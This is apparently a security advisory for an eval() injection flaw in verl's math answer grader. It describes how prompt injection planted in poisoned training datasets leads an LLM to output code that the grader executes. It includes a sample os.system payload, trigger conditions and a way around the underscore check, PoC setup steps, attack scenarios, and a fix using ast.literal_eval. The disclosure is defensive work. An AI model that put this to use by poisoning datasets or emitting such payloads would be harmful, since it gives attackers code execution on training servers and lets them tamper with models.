| Field | Details |
|---|---|
| Vulnerability Name | Indirect Prompt Injection to ACE via Unsafe eval() in Math Answer Grading |
| Vulnerability Type | CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (eval Injection) |
| Affected Component | verl/utils/reward_score/prime_math/grader.py Line 298-301 |
| Affected Versions | verl ≤ 0.7.0 (main branch still affected as of analysis date) |
| CVSS 3.1 | 8.1 (High) — AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
| GitHub | https://github.com/verl-project/verl |
| Dimension | Value | Rationale |
|---|---|---|
| Attack Vector | Network (N) | Attacker triggers remotely by poisoning training datasets, no local access required |
| Attack Complexity | High (H) | Requires indirectly controlling LLM output format via Prompt Injection, not direct parameter passing |
| Privileges Required | None (N) | No system authentication required |
| User Interaction | None (N) | Training/evaluation pipeline triggers automatically, no human intervention needed |
| Confidentiality | High (H) | Can read training data, model weights, API keys, etc. |
| Integrity | High (H) | Can tamper with model checkpoints, plant backdoors |
| Availability | High (H) | Can terminate training processes, destroy compute resources |
verl is an open-sou large model reinfoment learning training framework by ByteDance (19k+ Stars), supporting algorithms such as PPO and GRPO. In its math answer scoring module prime_math/grader.py, the math_equal() function is used to compare whether the model-generated answer is equivalent to the ground truth answer.
When the ground truth answer is a matrix type (containing \begin{pmatrix}) and the model's output answer starts with [ and ends with ], the code directly calls Python's built-in eval() function on the model output without any input sanitization or sandbox isolation.
An attacker can use Indirect Prompt Injection (injecting malicious instructions into the training dataset) to induce the LLM to output a string containing malicious Python code when answering matrix-type math problems. This string is extracted by match_answer(), passed into math_equal(), and ultimately executed by eval(), achieving arbitrary code execution (ACE).
File: verl/utils/reward_score/prime_math/grader.py Line 298-301
elif r"\begin{pmatrix}" in reference and prediction.startswith("[") and prediction.endswith("]"):
if isinstance(eval(prediction), list): # ← SINK: directly eval untrusted input
pred_matrix = eval(prediction) # ← second evalTrigger Conditions (all three must be satisfied simultaneously):
reference(ground truth answer) contains\begin{pmatrix}— i.e., a matrix-type math problemprediction(answer extracted from model) starts with[and ends with]predictiondoes not contain underscore_— otherwisehandle_base()will truncate during thenormalize()phase and throw aValueError
verl GRPO/PPO Training Loop
└→ RewardManager.__call__() # compute reward score for each rollout
└→ compute_score(solution_str, ground_truth) # prime_math/__init__.py
├→ match_answer(solution_str) # extract answer string from LLM output ← SOURCE
│ └→ locate answer via keyword matching ("answer is", \boxed{} etc.)
│ └→ return (is_matched, prediction) # prediction without any security filtering
└→ math_equal(prediction, reference) # grader.py Line 174
└→ normalize(prediction, pi) # Line 188 — preprocessing
│ └→ handle_base(prediction) # detect underscore _ and handle base conversion
│ └→ handle_pi(prediction, pi) # detect \pi and replace
└→ [matrix comparison branch] Line 298-301
└→ eval(prediction) # ← SINK: arbitrary code execution
File: verl/utils/reward_score/prime_math/__init__.py Line 347-386
def match_answer(response):
is_matched = False
# extract answer from LLM output via keywords
for ans_marker in ["answer:", "answer is", "answers are"]:
ans_idx = response.lower().rfind(ans_marker)
if ans_idx != -1:
is_matched = True
response = response[ans_idx + len(ans_marker):].strip()
# ... more extraction logic (\boxed{}, "is", "=" etc.) ...
# require the answer to contain at least one digit
is_matched = is_matched if any([c.isdigit() for c in response]) else False
return is_matched, responseThe input response to match_answer() comes from the raw output of the LLM model (solution_str). This function only performs text locating and slicing without any security filtering. In a Prompt Injection scenario, an attacker can manipulate problem descriptions in the training data to induce the model to output a malicious string in a specific format.
| Condition | Description |
|---|---|
| Training data contains matrix-type problems | ground_truth must contain \begin{pmatrix}; such problems are common in the MATH dataset |
| LLM output can be controlled | Induce the model via Prompt Injection to output an answer in the [malicious code] format |
| Payload contains no underscore | handle_base() splits on _ causing crashes; must use exec() instead of __import__() |
| Payload contains a digit | match_answer() line 384 requires at least one digit character in the answer |
| verl uses prime_math scoring | Requires data_source to correspond to MATH dataset or manually specifying the prime_math scoring function |
An attacker injects a "matrix problem" containing Prompt Injection instructions into a public math dataset. When other researchers use the verl framework for GRPO/PPO training on that dataset, the LLM is induced to output a malicious payload when answering that problem, and verl's scoring function automatically triggers eval() to execute arbitrary code.
Step 1: Attacker crafts a poisoned math problem (containing Prompt Injection)
↓
Step 2: Local LLM (Qwen2.5-14B-Instruct) receives the poisoned problem
↓
Step 3: LLM is successfully injected, outputs an answer containing malicious code:
"The answer is [exec("import os; os.system('echo PWNED1 > /tmp/verl-rce-proof.txt')")]"
↓
Step 4: verl compute_score() calls match_answer() to extract the answer
↓
Step 5: math_equal(prediction, reference) enters the matrix comparison branch
↓
Step 6: eval(prediction) executes the malicious code → writes to /tmp/verl-rce-proof.txt
↓
Step 7: RCE succeeds, attacker gains code execution on the training server
The following PoC has been verified successfully on macOS + Ollama (qwen2.5:14b-instruct) + verl 0.7.0.
# 1. Install Ollama and pull the model
curl -fsSL https://ollama.com/install.sh | sh
ollama pull qwen2.5:14b-instruct
# 2. Clone verl and install
git clone https://github.com/verl-project/verl.git
cd verl
pip install -e .
| Impact | Description |
|---|---|
| Arbitrary Code Execution | Attacker executes arbitrary system commands on the training/evaluation server |
| Data Theft | Read sensitive information such as training data, model weights, API keys, cloud credentials |
| Supply Chain Attack | Tamper with model checkpoints to plant backdoors, affecting all downstream users |
| Lateral Movement | Training clusters typically have high-privilege network access, can serve as a pivot for internal network penetration |
- Dataset Poisoning: An attacker injects matrix problems containing Prompt Injection into public math datasets (e.g., MATH, derived versions of GSM8K); triggered when researchers train with verl on that dataset
- Malicious Few-Shot: An attacker embeds malicious output templates in few-shot examples to induce the model to generate a payload during the evaluation phase
- Adversarial Input: Carefully crafted math problems that use token-level optimization to maximize the probability of the model outputting a malicious payload
Although CVSS rates Attack Complexity as High, actual exploitation is not particularly difficult:
- In GRPO training, each prompt generates 8-64 rollouts; triggering requires only one successful hit
- In testing, Qwen2.5-14B-Instruct was successfully injected on the first attempt
- The
exec()payload bypasseshandle_base()preprocessing and can reliably reacheval() - Matrix-type problems are common in the MATH dataset; attackers do not need to craft their own ground_truth
Replace eval() with ast.literal_eval(), which only allows parsing Python literals:
import ast
# grader.py Line 298-301, before fix:
elif r"\begin{pmatrix}" in reference and prediction.startswith("[") and prediction.endswith("]"):
if isinstance(eval(prediction), list): # ← dangerous
pred_matrix = eval(prediction) # ← dangerous
# After fix:
elif r"\begin{pmatrix}" in reference and prediction.startswith("[") and prediction.endswith("]"):
try:
parsed = ast.literal_eval(prediction) # ← safe: only accepts literals
if isinstance(parsed, list):
pred_matrix = parsed
# ... subsequent comparison logic ...
except (ValueError, SyntaxError):
passast.literal_eval() only accepts Python literals such as strings, numbers, lists, and dictionaries, and will not execute arbitrary code.
- Global audit of
eval()/exec()calls: Thehandle_pi()function ingrader.py(Line 82) also contains aneval()call; although wrapped withcontextlib.suppress(Exception), it should still be replaced - Input validation allowlist: Add format validation at the output stage of
match_answer(), only allowing mathematical expression characters (digits, operators, brackets, commas) - Sandbox isolation: Sandbox the execution environment of the reward function, restricting access to modules such as
osandsubprocess - Dependency security scanning: Include
eval()usage in CI/CD security checks to prevent new eval injection points from being introduced in subsequent code